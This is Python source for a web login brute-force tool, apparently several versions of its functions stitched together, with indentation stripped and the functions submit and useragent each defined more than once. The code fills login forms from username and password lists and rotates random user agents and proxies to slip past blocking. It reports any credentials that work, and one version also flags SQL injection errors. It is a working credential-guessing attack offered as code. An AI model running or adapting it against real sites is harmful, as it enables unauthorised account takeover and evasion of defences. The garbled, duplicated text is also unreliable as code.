def submit(optionURL, tryCred, setProxyList, setKeyFalse, optionVerbose,
loginInfo, result, optionReauth):
# Get login form field informations
# BUG parse form issue with gmail, move to tbrowser.parseLoginForm
frmLoginID, frmFields = loginInfo
tryPassword, tryUsername = tryCred
proc = tbrowser.startBrowser()
user_agent = tbrowser.useragent()
proc.addheaders = [('User-Agent', user_agent)]
for cred in list(result.queue):
if tryUsername == cred[0]:
return 0 # don't run if find password of username
if setProxyList:
#Set proxy connect
proxyAddr = actions.randomFromList(setProxyList)
proc.set_proxies({"http": proxyAddr})
try:
proc.open(optionURL)
# Select login form
proc.select_form(nr=frmLoginID)
# FILLS ALL FIELDS https://stackoverflow.com/a/5389578
for field, cred in zip(frmFields, tryCred):
proc.form[field] = cred
# Send request
proc.submit()
if optionVerbose:
utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
if setProxyList:
utils.printf("Using proxy: %s" % (proxyAddr), 'norm')
# Reload - useful for redirect to dashboard
proc.reload()
# If no login form -> success
# TODO improve condition to use captcha
if not tbrowser.parseLoginForm(proc.forms()):
if setKeyFalse:
if setKeyFalse not in proc.response().read():
# Add creds to success list
# If verbose: print
if tryUsername:
utils.printf(
"[*] Match found: %s:%s" %
(tryUsername, tryPassword), "good")
#result.put([tryUsername, tryPassword])
else:
utils.printf("[*] Password found: %s" % (tryPassword),
"good")
#result.put([tryPassword])
if not optionReauth:
result.put([tryUsername, tryPassword])
else:
result.put([
optionURL.split("/")[2], tryUsername, tryPassword
])
# Clear object and try new username
else:
if optionVerbose:
utils.printf(
"[-] Failed: %s:%s" % (tryUsername, tryPassword),
"bad")
else:
if tryUsername:
utils.printf(
"[*] Match found: %s:%s" % (tryUsername, tryPassword),
"good")
#result.put([tryUsername, tryPassword])
else:
utils.printf("[*] Password found: %s" % (tryPassword),
"good")
#result.put([tryPassword])
if not optionReauth:
result.put([tryUsername, tryPassword])
else:
result.put(
[optionURL.split("/")[2], tryUsername, tryPassword])
# Clear object and try new username
else:
if optionVerbose:
utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword),
"bad")
except mechanize.HTTPError as error:
# Get blocked
if optionVerbose:
utils.printf(
"[x] Error: %s:%s\n%s at %s" %
(tryUsername, tryPassword, error, optionURL), "bad")
return False
except Exception as error:
if optionVerbose:
utils.printf(
"[x] Error: %s:%s\n%s at %s" %
(tryUsername, tryPassword, error, optionURL), "bad")
return False
finally:
proc.close()
return True
def useragent():
agents = data.getAgent()
return actions.randomFromList(agents.split("\n"))
def submit(options, loginInfo, tryCred, result):
# Get login form field informations
# frmLoginID, frmFields = loginInfo
tryPassword, tryUsername = tryCred
proc = startBrowser()
for cred in list(result.queue):
if tryUsername == cred[1]:
return True
if options.proxy:
# Set proxy connect
proxyAddr = randomFromList(options.proxy)
proc.set_proxies({"http": proxyAddr})
try:
proc.open(options.login_url)
_form = parseLoginForm(proc.forms())
if not _form:
if options.verbose:
printf("[x] LoginBrute: No login form found. Possibly get blocked!")
return False
else:
frmLoginID, frmFields = _form
frmUsername, _ = frmFields
if options.verbose and loginInfo != _form:
printf("[+] Warning: Form field has been changed!")
# Select login form
proc.select_form(nr = frmLoginID)
# FILLS ALL FIELDS https://stackoverflow.com/a/5389578
proc.form[frmUsername] = tryUsername
proc.submit()
_, _, frmPasswd = parseLoginForm(proc.forms())
proc.form[frmPasswd] = tryPassword
proc.submit()
# page_title = proc.title()
# Send request
if options.verbose:
if options.proxy:
printf("[+] Trying: %s through %s" %([tryUsername, tryPassword],proxyAddr), 'norm')
else:
printf("[+] Trying: %s" %([tryUsername, tryPassword]), 'norm')
# Reload the browser. For javascript redirection and others...
# proc.reload()
# If no login form -> maybe success. Check conditions
if not parseLoginForm(proc.forms()):# != loginInfo:
test_result = check_condition(options, proc, loginInfo)
if test_result == 1:
printf("[*] Page title: ['%s']" %(proc.title()), "good")
# "If we tried login form with username+password field"
if tryUsername:
printf("[*] Found: %s" %([tryUsername, tryPassword]), "good")
# "Else If we tried login form with password field only"
else:
printf("[*] Found: %s" %([tryPassword]), "good")
result.put([options.url, tryUsername, tryPassword])
elif test_result == 2 and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" %([tryUsername, tryPassword]), "norm")
else:
# Possibly Error. But sometime it is true
if options.verbose:
printf("[x] Get error page: %s" %([tryUsername, tryPassword]), "bad")
printf(" [x] Page title: ['%s']" %(proc.title()), "bad")
# "Login form is still there. Oops"
else:
# TODO test if web has similar text (static)
if sqlerror(proc.response().read()) and options.verbose:
printf("[+] SQL Injection vulnerable found")
printf(" %s" %([tryUsername, tryPassword]), "norm")
if options.verbose:
if options.proxy:
printf(
"[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr),
"bad"
)
else:
printf(
"[-] Failed: %s" %([tryUsername, tryPassword]),
"bad"
)
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
try:
# Unauthenticated
if error.code == 401:
if options.verbose:
printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad")
# Server misconfiguration? Panel URL is deleted or wrong
elif error.code == 404:
printf("[x] %s: %s" %(error, tryCred[::-1]), "bad")
if options.verbose:
printf(" %s" %(proc.url()), "bad")
# Other error code
else:
if options.verbose:
printf("[x] (%s): %s" %(proc.url(), tryCred[::-1]), "bad")
except:
# THIS BLOCKED BY WAF
printf("[x] Loginbrute: %s" %(error), "bad")
return False
finally:
proc.close()
def useragent():
# Try random agent everytime it is called
# TODO better useragent with library (or create my own - takes time)
return randomFromList(data.getAgent().split("\n"))
def useragent():
return randomFromList(data.getAgent().split("\n"))
def handle(optionURL, optionUserlist, optionPasslist, sizePasslist,
setProxyList, setKeyFalse):
############################################
# Old code logic:
# Create 1 browser object per password
# Current:
# Create 1 browser object per username
# Pick 1 user agent per password try
#
############################################
# Get login form field informations
frmLoginID, frmUserfield, frmPassfield = parseFormInfo(optionURL)
# Get single Username in username list / file
for tryUsername in optionUserlist:
# If tryUsername is file object, remove \n
# tryUsername = tryUsername[:-1]
tryUsername = tryUsername.replace('\n', '')
try:
optionPasslist.seek(0)
except:
pass
###### new test code block
proc = tbrowser.startBrowser()
# proc = mechanize.Browser()
# proc.set_handle_robots(False)
######
idxTry = 0
for tryPassword in optionPasslist:
# Get single Password, remove \n
tryPassword = tryPassword.replace('\n', '')
# New test code block: add new user_agent each try
user_agent = tbrowser.useragent()
proc.addheaders = [('User-Agent', user_agent)]
#print "Debug: %s:%s" %(tryUsername, tryPassword)
if setProxyList:
#Set proxy connect
proxyAddr = actions.randomFromList(setProxyList)
#utils.printf("Debug: proxy addr %s" %(proxyAddr))
proc.set_proxies({"http": proxyAddr})
proc.open(optionURL)
# End new code block
try:
idxTry += 1
# Select login form
proc.select_form(nr=frmLoginID)
proc.form[frmUserfield] = tryUsername
proc.form[frmPassfield] = tryPassword
# Print status bar
utils.printp(tryUsername, idxTry, sizePasslist)
# Send request
proc.submit()
# Reload - useful for redirect to dashboard
proc.reload()
# If no login form -> success
# TODO improve condition to use captcha
if not tbrowser.getLoginForm(proc.forms()):
#TODO edit mixed condition
if setKeyFalse:
if setKeyFalse not in proc.response().read():
# Add creds to success list
# If verbose: print
printSuccess(tryUsername, tryPassword)
# Clear object and try new username
proc.close()
break
else:
utils.printSuccess(tryUsername, tryPassword)
# Clear object and try new username
proc.close()
break
except mechanize.HTTPError as error:
# Get blocked
utils.die("Thread has been blocked", error)
proc.close()
def submit(optionURL, tryUsername, tryPassword, sizeTask, setProxyList,
setKeyFalse, optionVerbose, loginInfo, result):
############################################
# Old code logic:
# Create 1 browser object per password
# Current:
# Create 1 browser object per username
# Pick 1 user agent per password try
#
############################################
# Get login form field informations
frmLoginID, frmUserfield, frmPassfield = loginInfo
# Get single Username in username list / file
proc = tbrowser.startBrowser()
# Get single Password, remove \n
# New test code block: add new user_agent each try
user_agent = tbrowser.useragent()
proc.addheaders = [('User-Agent', user_agent)]
for cred in list(result.queue):
if tryUsername == cred[0]:
# if optionVerbose:
# utils.printf("Canceled: %s:%s" %(tryUsername, tryPassword))
return 0 # don't run if find password of username
if setProxyList:
#Set proxy connect
proxyAddr = actions.randomFromList(setProxyList)
#utils.printf("Debug: proxy addr %s" %(proxyAddr))
proc.set_proxies({"http": proxyAddr})
proc.open(optionURL)
# End new code block
try:
# Select login form
proc.select_form(nr=frmLoginID)
proc.form[frmUserfield] = tryUsername
proc.form[frmPassfield] = tryPassword
# Send request
proc.submit()
# Print status bar
if optionVerbose:
utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm')
if setProxyList:
utils.printf("Using proxy: %s" % (proxyAddr), 'norm')
#utils.printp(trying, sizeTask)
#proc.submit()
# Reload - useful for redirect to dashboard
proc.reload()
# If no login form -> success
# TODO improve condition to use captcha
if not tbrowser.parseLoginForm(proc.forms()):
if setKeyFalse:
if setKeyFalse not in proc.response().read():
# Add creds to success list
# If verbose: print
utils.printf(
"Match found: %s:%s" % (tryUsername, tryPassword),
"good")
result.put([tryUsername, tryPassword])
# Clear object and try new username
proc.close()
else:
if optionVerbose:
utils.printf(
"Failed: %s:%s" % (tryUsername, tryPassword),
"bad")
else:
utils.printf("Match found: %s:%s" % (tryUsername, tryPassword),
"good")
result.put([tryUsername, tryPassword])
# Clear object and try new username
proc.close()
else:
if optionVerbose:
utils.printf("Failed: %s:%s" % (tryUsername, tryPassword),
"bad")
except mechanize.HTTPError as error:
# Get blocked
if optionVerbose:
utils.printf(
"Error: %s:%s\n%s" % (tryUsername, tryPassword, error), "bad")
return False
except Exception as error:
if optionVerbose:
utils.printf(
"Error: %s:%s\n%s" % (tryUsername, tryPassword, error), "bad")
return False
proc.close()
return True